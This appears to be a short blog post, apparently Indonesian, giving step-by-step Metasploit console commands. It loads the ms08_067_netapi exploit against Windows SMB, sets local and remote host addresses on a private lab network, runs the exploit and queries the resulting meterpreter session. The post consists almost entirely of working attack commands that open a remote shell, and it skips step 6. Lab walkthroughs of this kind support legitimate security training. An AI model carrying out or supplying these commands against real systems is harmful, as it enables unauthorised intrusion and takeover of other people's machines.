1. We typed in the consol --> # msfconsole
2. We are typing --> msf > use exploit/windows/smb/
3. Then typing --> msf > use exploit/windows/smb/ms08_067_netapi
4. Then typing --> msf exploit(ms08_067_netapi) > set lhost 192.168.56.1
lhost => 192.168.56.1
5. Next typing --> msf exploit(ms08_067_netapi) > set rhost 192.168.56.101
rhost => 192.168.56.101
7. Next typing --> msf exploit(ms08_067_netapi) > exploit
8. Next typing --> meterpreter > sysinfo
- So the result as below
0 komentar:
Posting Komentar